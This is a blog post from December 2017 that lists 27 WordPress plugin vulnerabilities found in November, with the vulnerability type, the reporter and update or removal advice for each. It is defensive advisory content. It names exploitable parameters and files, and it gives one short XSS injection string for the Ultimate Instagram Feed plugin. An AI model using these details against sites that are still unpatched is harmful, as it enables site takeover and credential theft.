WP Security: 27 plugin vulnerabilities in November

December 4, 2017
WP Security: plugin vulnerabilities October

For your WP Security, be informed about the latest vulnerabilities in WordPress plugins:

  1. Qards
    • Stored Cross-Site Scripting (XSS) + Server Side Request Forgery (SSRF) reported by theMiddle https://twitter.com/Menin_TheMiddle. The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
      • NO updates yet to premium plugin to fix vulnerabilities.
  2. Import any XML or CSV File to WordPress
    • Cross-Site Scripting (XSS) reported by Dewhurst Security. The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
      • immediately update to version 3.4.5 to fix vulnerability
  3. Contact Form for WordPress – Ultimate Form Builder Lite
    • SQL Injection reported by Dewhurst Security. The exploit being used combines a SQL injection vulnerability and a PHP object injection vulnerability. It allows attackers to take over a vulnerable site using just one request to /wp-admin/admin-ajax.php.
      • immediately update to version 1.3.7, to fix vulnerability. Consider owl CONTACTS as a more secure replacement candidate.
  4. PopCash.Net Code Integration Tool
    • Cross-Site Scripting (XSS) reported by Dewhurst Security. PopCash.Net Publisher Code Integration plugin is prone to a cross-site scripting
      vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
      • immediately update to version 1.1 to fix vulnerability
  5. Easy Appointments
    • Cross-Site Scripting (XSS) reported by Dewhurst Security. The Easy Appointments plugin before 1.12.0 for WordPress has XSS via a Settings values in the admin panel
      • immediately update to version 1.12.0 to fix vulnerability
  6. Caldera Forms
    • Authenticated Cross-Site Scripting (XSS) reported by Will Brand (https://wrbrand.com/). Caldera Forms is vulnerable to a reflected cross-site scripting vulnerability in the “edit” parameter, which is not properly escaped before being printed in an HTML attribute. An attacker can use this to craft URLs that, when clicked, result in malicious JavaScript being executed. Because Caldera Forms uses ‘wp_rest’ nonces to access the WordPress REST API – a common practice among plugin developers – this Javascript may include anything the user is capable of doing in the REST API.
      • immediately update to version 1.5.5 to fix vulnerability. Consider owl CONTACTS as a more secure replacement candidate.
  7. User Login History
    • Cross-Site Scripting (XSS) reported by Dewhurst Security. Multiple cross-site scripting (XSS) vulnerabilities in the user-login-history plugin through 1.5.2 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) date_from, (2) date_to, (3) user_id, (4) username, (5) country_name, (6) browser, (7) operating_system, or (8) ip_address parameter to admin/partials/listing/listing.php.
      • immediately update to version 1.6 to fix vulnerability
  8. WordCamp Talks
    • Formula injection via CSV exports reported by Dewhurst Security. The WordCamp Talks plugin does not attempt to sanitize CSV exports, which can lead to spreadsheet formula injection via malicious inputs.
      • immediately update to version 1.0.0 Beta3 to fix vulnerability
  9. Shortcodes Ultimate
    • Authenticated Contributor Code Execution reported by Robert Mathews (https://tigertech.net/). The Shortcodes Ultimate plugin does not sanitize the "filter" argument to the "su_meta", "su_user", and "su_post" shortcodes, allowing the filter to be set to the "system()" function which runs arbitrary code. This is being exploited in the wild; I discovered this through analysis of mod_security audit logs on two compromised sites today.
      • immediately update to version 5.0.1 to fix vulnerability
  10. Ultimate Instagram Feed
    • Authenticated Cross-Site Scripting (XSS) reported by Dimopoulos Elias (https://gr.linkedin.com/in/dimopouloselias/). The vulnerability lies in the "*access_token*" parameter and can cause reflected *XSS* vulnerability.
    • immediately update to version 1.3.1 to fix vulnerability
    • Authenticated Cross-Site Scripting (XSS) reported by Gilzow (http://missouri.edu). XSS vulnerability remains in 1.3 and 1.3.1 as the author passes _GET['access_token'] to sanitize_text_field(). However, the value is inserted into an attribute of an element, and sanitize_text_field() does not filter for quotes (single or double). Therefore, injecting %22+onblur%3D%22alert%281%29 for access_token will still result in an exploitable injection.
      • NO updates provided from developer to fix vulnerability. Remove plugin immediately.
  11. WPML Translation Management
    • PHP Object Injection reported by Thomas Chauchefoin (Synacktiv - https://synacktiv.com/en/. No public disclosure provided.
      • immediately update to version 2.4.2 to fix vulnerability
  12. Simple Events Calendar
    • Authenticated SQL Injection reported by Lenon Leite (http://lenonleite.com.br/). Type user access: administrator user. "$_POST[‘event_id’]" is not escaped.
      • NO updates provided from developer to fix vulnerability. Remove plugin immediately.
  13. Events
    • Authenticated SQL Injection reported by Lenon Leite (http://lenonleite.com.br/). Type user acces: administrator user. "$_GET[‘edit_event’]" is not escaped.
      • NO updates provided from developer to fix vulnerability. Remove plugin immediately.
  14. JTRT Responsive Tables
    • Authenticated SQL Injection reported by Dewhurst Security. Type user acces: registered single user. "$_POST[‘tableId’]" is not escaped.
      • immediately update to version 4.1.1 to fix vulnerability
  15. Active Directory Integration
    • Authenticated SQL Injection reported by Dewhurst Security. Type user access: administrator. Target need have configured LDAP and active. "$_GET[‘userid’]" is not escaped.
      • NO updates provided from developer to fix vulnerability. Remove plugin immediately.
  16. UserPro
    • Authentication Bypass reported by Colette Chamberland, Iain Hadgraft https://wordfence.com/. The UserPro plugin has the ability to bypass login authentication for the user 'admin'. If the site does not use the standard username 'admin' it is not affected. If the site has a default 'admin' user you will now see the wp menu at the top of the site and you are logged in will full administrator access.
      • immediately update to version 4.9.17.1 to fix vulnerability
  17. WP Support Plus Responsive Ticket System
    • Remote Code Execution (RCE) reported by Robert Mathews (https://tigertech.net/). WP Support Plus Responsive Ticket System <= 8.0.7 allows anyone to upload PHP files with extensions like ".phtml", ".php4", ".php5", and so on, all of which are run as if their extension was ".php" on most hosting platforms.
      • immediately update to version 8.0.8 to fix vulnerability
  18. Email Log
    • Stored Cross-Site Scripting (XSS) reported by Dewhurst Security. Only proof of concept disclosed.
      • immediately update to version 2.2.3 to fix vulnerability
  19. WP Mail Logging
    • Stored Cross-Site Scripting (XSS) reported by Dewhurst Security. Only proof of concept disclosed.
      • immediately update to version 1.8.3 to fix vulnerability
  20. bbPress
    • Unauthenticated SQL Injection reported by Dewhurst Security. Requires anonymous posting option to be enabled and WordPress version < 4.8.3.
      • NOT patched by bbPress! Updating to WordPress 4.8.3 fixes this issue
  21. Duplicator
    • Stored Cross-Site Scripting (XSS) reported by Dewhurst Security. installer.php in the Snap Creek Duplicator (WordPress Site Migration & Backup) plugin before 1.2.30 for WordPress has XSS because the values "url_new" (/wp-content/plugins/duplicator/installer/build/view.step4.php) and "logging" (wp-content/plugins/duplicator/installer/build/view.step2.php) are not filtered correctly.
      • immediately update to version 1.2.29 to fix vulnerability
  22. Formidable Forms
    • Multiple Vulnerabilities reported by Dewhurst Security. The plugin implemented a form preview AJAX function accessible to anyone without authentication. The function accepted some parameters affecting the way it generates the form preview HTML. Parameters after_html and before_html could be used to add custom HTML after and before the form. Most of the vulnerabilities relied on this feature.
      • immediately update to version 2.05.03 to fix vulnerability. Consider owl CONTACTS as a more secure replacement candidate.
  23. Yoast SEO
    • Unauthenticated Cross-Site Scripting (XSS) reported by Dewhurst Security. Vulnerability in admin/google_search_console/class-gsc-table.php in the Yoast SEO plugin before 5.8.0 for WordPress allows remote attackers to inject arbitrary web script or HTML.
      • immediately update to version 5.8 to fix vulnerability
  24. TablePress
    • Authenticated XML External Entity (XXE) reported by Dewhurst Security. TablePress prior to version 1.8.1 allows an attacker to conduct XML External Entity (XXE) attacks via unspecified vectors.
      • immediately update to version 1.8.1 to fix vulnerability
  25. InLinks
    • Authenticated SQL Injection reported by Dimopoulos Elias (https://gr.linkedin.com/in/dimopouloselias/). SQL injection is POST parameter "keyword". Affected file inlinks/inlinks.php
      • DELETE immediately to fix vulnerability. This plugin has been closed and is no longer available for download.
  26. Elementor Page Builder
    • Authenticated Unrestricted Editing reported by James Golovich (https://pritect.net/). Many AJAX actions are unsecured, allowing logged in users unrestricted access to the internal Elementor functions.
      • immediately update to version 1.8.0 to fix vulnerability
  27. Emag Marketplace Connector
    • Unauthenticated Cross-Site Scripting (XSS) reported by Dewhurst Security. The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly.
      • immediately update to version 1.0.1 to fix vulnerability

Protect your WordPress!

BEFORE IT'S TOO LATE! You will also protect your customers, your reputation and your online business.

No comments

Leave a Reply

Your email address will not be published.

WP Security: 27 plugin vulnerabilities in November

by Csaba Miklós time to read: 10 min
0